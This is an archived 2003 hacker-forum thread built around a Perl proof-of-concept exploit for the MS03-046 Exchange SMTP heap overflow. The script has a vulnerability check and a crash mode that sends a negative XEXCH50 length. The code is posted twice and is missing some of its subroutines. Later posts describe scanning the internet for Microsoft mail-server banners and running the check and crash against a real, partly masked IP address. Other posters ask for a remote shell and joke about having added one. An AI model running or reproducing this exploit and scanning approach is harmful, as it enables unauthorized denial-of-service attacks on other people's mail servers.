## # ms03-046.pl - hdm metasploit com # This vulnerability allows a remote unauthenticated user to overwrite big chunks # of the heap used by the inetinfo.exe process. Reliably exploiting this bug is # non-trivial; even though the entire buffer is binary safe (even nulls) and can be # just about any size, the actual code that crashes varies widely with each request. # During the analysis process, numerous combinations of request size, concurrent # requests, pre-allocations, and alternate trigger routes were examined and not a # single duplicate of location and data offset was discovered. Hopefully the magic # combination of data, size, and setup will be found to allow this bug to be reliably # exploited.
# minor bugfix: look for 354 Send binary data
use strict; use IO::Socket;
my $host = shift() || usage(); my $mode = shift() || "CHECK"; my $port = 25;
if (uc($mode) eq "CHECK") { check() } if (uc($mode) eq "CRASH") { crash() }
usage();
sub check { my $s = SMTP($host, $port); if (! $s) { print "[*] Error establishing connection to SMTP service.\n"; exit(0); }
print $s "XEXCH50 2 2\r\n"; my $res = <$s>; close ($s);
# a patched server only allows XEXCH50 after NTLM authentication if ($res !~ /354 Send binary/i) { print "[*] This server has been patched or is not vulnerable.\n"; exit(0); }
print "[*] This system is vulnerable: $host:$port\n";
exit(0); }
sub crash { my $s = SMTP($host, $port); if (! $s) { print "[*] Error establishing connection to SMTP service.\n"; exit(0); }
# the negative value allows us to overwrite random heap bits print $s "XEXCH50 -1 2\r\n"; my $res = <$s>;
# a patched server only allows XEXCH50 after NTLM authentication if ($res !~ /354 Send binary/i) { print "[*] This server has been patched or is not vulnerable.\n"; exit(0); }
print $s "RCPT TO: Administrator\r\n"; $r = <$s>; return undef if !$r;
return($s); }
Kynroxes
Oct 22 2003, 04:52 PM
yeah ya Gurou, kotik rulezz, I will see it ... tks
Gurou
Oct 22 2003, 05:55 PM
any one can modify and add a shell ?
thatsmej
Oct 22 2003, 06:40 PM
QUOTE (Gurou @ Oct 22 2003, 05:55 PM)
any one can modify and add a shell ?
why is t, that every time a POC is released, ppl reply with this?
just wait :\
-=[MePhIsTo]=-
Oct 22 2003, 06:58 PM
How to scan for this Vulnerable ? It5 seemes Port 25 (MS SMTP Service) But wich version are vulnarable ?!?!
-=[MePhIsTo]=-
Oct 22 2003, 07:09 PM
Here is a example of Vulnerable i found:
I searched for Port 25 and the Banner String *microsoft*
CODE
212.17.*.* 25 220 web.ex****a.it ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2653.13) ready.
after that i Checked
CODE
C:\Dokumente und Einstellungen\Mephisto\Desktop>as.pl Usage: C:\Dokumente und Einstellungen\Mephisto\Desktop\as.pl <host> [CHECK|CRASH ]
C:\Dokumente und Einstellungen\Mephisto\Desktop>as.pl 212.17.*.* CHeck [*] This system is vulnerable: 212.17.*.*:25
and after the exploitation
CODE
C:\Dokumente und Einstellungen\Mephisto\Desktop>as.pl 212.17.*.* Crash [*] This server has been patched or is not vulnerable.
This was my first try
any
Oct 22 2003, 10:58 PM
QUOTE (Gurou @ Oct 22 2003, 05:55 PM)
any one can modify and add a shell ?
gimme a moment, i'm calling mr bullshit...
beep beep
any
Oct 22 2003, 11:07 PM
QUOTE
#!/usr/bin/perl -w ##################
## # ms03-046.pl - hdm metasploit com # This vulnerability allows a remote unauthenticated user to overwrite big chunks # of the heap used by the inetinfo.exe process. Reliably exploiting this bug is # non-trivial; even though the entire buffer is binary safe (even nulls) and can be # just about any size, the actual code that crashes varies widely with each request. # During the analysis process, numerous combinations of request size, concurrent # requests, pre-allocations, and alternate trigger routes were examined and not a # single duplicate of location and data offset was discovered. Hopefully the magic # combination of data, size, and setup will be found to allow this bug to be reliably # exploited.
# minor bugfix: look for 354 Send binary data
use strict; use IO::Socket;
my $host = shift() || usage(); my $mode = shift() || "CHECK"; my $port = 25;
if (uc($mode) eq "CHECK") { check() } if (uc($mode) eq "CRASH") { crash() }
usage();
sub check { my $s = SMTP($host, $port); if (! $s) { print "[*] Error establishing connection to SMTP service.\n"; exit(0); }
print $s "XEXCH50 2 2\r\n"; my $res = <$s>; close ($s);
# a patched server only allows XEXCH50 after NTLM authentication if ($res !~ /354 Send binary/i) { print "[*] This server has been patched or is not vulnerable.\n"; exit(0); }
print "[*] This system is vulnerable: $host:$port\n";
exit(0); }
sub crash { my $s = SMTP($host, $port); if (! $s) { print "[*] Error establishing connection to SMTP service.\n"; exit(0); }
# the negative value allows us to overwrite random heap bits print $s "XEXCH50 -1 2\r\n"; my $res = <$s>;
# a patched server only allows XEXCH50 after NTLM authentication if ($res !~ /354 Send binary/i) { print "[*] This server has been patched or is not vulnerable.\n"; exit(0); }
print $s "RCPT TO: Administrator\r\n"; $r = <$s>; return undef if !$r;
return($s); }
i implemented a shell into that mfin' poc only for you, wasn't easy i can tell ya
slb33
Oct 23 2003, 04:53 AM
Hehe...Good work!
I'm glad someone finally put a shell into this poc!
lmao
Gurou
Oct 23 2003, 08:48 AM
strasharo
Oct 23 2003, 09:27 AM
Good work hahahha.
Thom
Oct 23 2003, 01:16 PM
Can someone compile it under win?
any
Oct 23 2003, 01:22 PM
QUOTE (th0m @ Oct 23 2003, 01:16 PM)
Can someone compile it under win?
dude, THERE is the door
gogu258
Oct 24 2003, 10:11 PM
NOOBS, not all pps from this topic, IT'S DOS - DENIAL OF SERVICE EXPLOIT, IT WORKS WITH PERL SO DON'T ASK FOR COMPILED VERSION. Just use perl for windows or something like that, why don't you read source or use hint? There is something very clear "Usage: $0 <host> [CHECK|CRASH ]\n" What shell, there is no shell.
devil666
Oct 30 2003, 10:09 AM
QUOTE
What shell, there is no shell.
Look at the red & Yellow sign on top of the poc !!!
LOL
lasantarosa
Oct 30 2003, 12:56 PM
LOL !!!
morbido
Nov 1 2003, 11:40 PM
thankz a lot bro I'll check it
morbido
Nov 1 2003, 11:48 PM
Big LOL shitty thing its for nothing this lol
zadium
Nov 2 2003, 03:32 AM
LOL
Cheeky bastard
VamPs
Nov 4 2003, 08:10 AM
lmao, took me awhile
least some people have got a saense of humour tho
limbox
Nov 4 2003, 09:11 PM
that's cool, hehe
redjoker
Dec 5 2003, 06:58 PM
i need EXE This file for Windows Platform... Plase Help me... Thank's
hmm, i get a big fat [*] Error establishing connection to SMTP service. maybe im missing something
gsicht
Dec 6 2003, 04:07 PM
lol, good job any, i tested it. it worked great!!!
QuadMedic
Dec 10 2003, 06:52 AM
shell rox cool gas...................
GhostCow
Dec 10 2003, 07:11 AM
great job any!! thanks a bunch!! i just hope it will work ROFL!!!!!!!!!!!
for anyone who is looking for a banner scanner: check out the GSO software projects forum or the tool design forum, gan green and coder made nice banner scanners worth using!
QUOTE
I searched for Port 25 and the Banner String *microsoft*
thanks for the tip mephisto!
yeyo
Dec 10 2003, 04:08 PM
QUOTE (redjoker @ Dec 5 2003, 06:58 PM)
i need EXE This file for Windows Platform... Plase Help me... Thank's
joker
There is a perl2exe in the board man, use the search button
Thanks 4 the code, i'll try it
--Elite--
Feb 26 2004, 01:21 AM
cheers Finally , this heap overflow let u sneak in shell ! yeah ! another hard to exploit one + another specialist = remote code excution
Chinzo
Feb 26 2004, 09:23 AM
QUOTE (--Elite-- @ Feb 26 2004, 01:21 AM)
cheers Finally , this heap overflow let u sneak in shell ! yeah ! another hard to exploit one + another specialist = remote code excution
Ok, cool man, will "the another specialist" let us view the code for "remote code excution " ?
R3myBoy
Feb 26 2004, 09:41 AM
That's perl script .... No real need of compiling it under windows ... Just install the Active Perl on your box ....
BTW nice shell
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
]\n"
hahah n1
